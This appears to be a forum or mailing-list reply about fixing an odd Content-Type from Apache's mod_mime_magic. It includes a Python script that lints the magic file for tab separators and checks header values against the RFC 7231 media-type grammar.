I guess you could try replacing the tab in the magic file with a space.
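To see which magic-file entries that suggestion would touch, and to check what a Content-Type value looks like against the media-type grammar, here is an added example script (not httpd code). It reads the offset/type/test/MIME/encoding columns of mod_mime_magic's magic file with a simplified parser (assumption: the test field holds no escaped blanks, which some real entries do), flags entries where a tab rather than a space follows the MIME type, and checks values such as "text/plain\t" against the RFC 7231 type/subtype grammar. The magic excerpt is constructed after the ";;" line quoted above.

```python
"""Lint a mod_mime_magic 'magic' file for entries that would yield an odd
Content-Type, and check header values against the media-type grammar.
Added example, not httpd code; the magic excerpt is constructed."""
import re

# RFC 7230 token characters and the RFC 7231 media-type shape:
# type/subtype with optional ;name=value parameters and no stray blanks.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
MEDIA_TYPE = re.compile(rf'^{TOKEN}/{TOKEN}(?:[ \t]*;[ \t]*{TOKEN}=(?:{TOKEN}|"[^"]*"))*$')

# offset  type  test  mime  [encoding]; '>' prefixes on the offset mark
# continuation levels.  Assumption: no escaped blanks inside the test field.
ENTRY = re.compile(r"^(?P<offset>>*\S+)[ \t]+(?P<type>\S+)[ \t]+(?P<test>\S+)"
                   r"[ \t]+(?P<mime>\S+)(?P<sep>[ \t]*)(?P<encoding>\S*)")


def content_type_ok(value):
    """True for 'text/plain' or 'text/plain; charset=UTF-8', False for 'text/plain\\t'."""
    return MEDIA_TYPE.match(value) is not None


def parse_magic(text):
    """Entries of a magic file, skipping blanks, comments and unparsable lines."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENTRY.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        entries.append({
            "line": lineno,
            "level": len(d["offset"]) - len(d["offset"].lstrip(">")),
            "mime": d["mime"],
            "encoding": d["encoding"] or None,
            "tab_after_mime": "\t" in d["sep"],
        })
    return entries


def lint(text):
    """Entries whose MIME field is malformed, or is followed by a tab, the
    separator Kent suggests swapping for a space."""
    problems = []
    for e in parse_magic(text):
        if not content_type_ok(e["mime"]):
            problems.append({"line": e["line"], "issue": f"bad media type {e['mime']!r}"})
        elif e["tab_after_mime"]:
            problems.append({"line": e["line"], "issue": "tab after MIME type; replace with a space"})
    return problems


# Constructed excerpt: the ';;' entry from the thread in its tab-separated
# form, one space-separated entry, and one with no encoding column.
MAGIC = (
    "# constructed excerpt\n"
    "0\tstring\t;;\ttext/plain\t8bit\n"
    "0 string %PDF- application/pdf\n"
    "0\tstring\t\\177ELF\tapplication/x-executable\n"
)

if __name__ == "__main__":
    for p in lint(MAGIC):
        print(f"line {p['line']}: {p['issue']}")
    print("text/plain\\t accepted:", content_type_ok("text/plain\t"))
```

Run `lint(open("/etc/httpd/conf/magic").read())` (or wherever the distribution puts the file) to list every entry the space-for-tab edit would need to cover; `content_type_ok` applied to the value from `wget -S` tells you whether the header you got back is well-formed.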

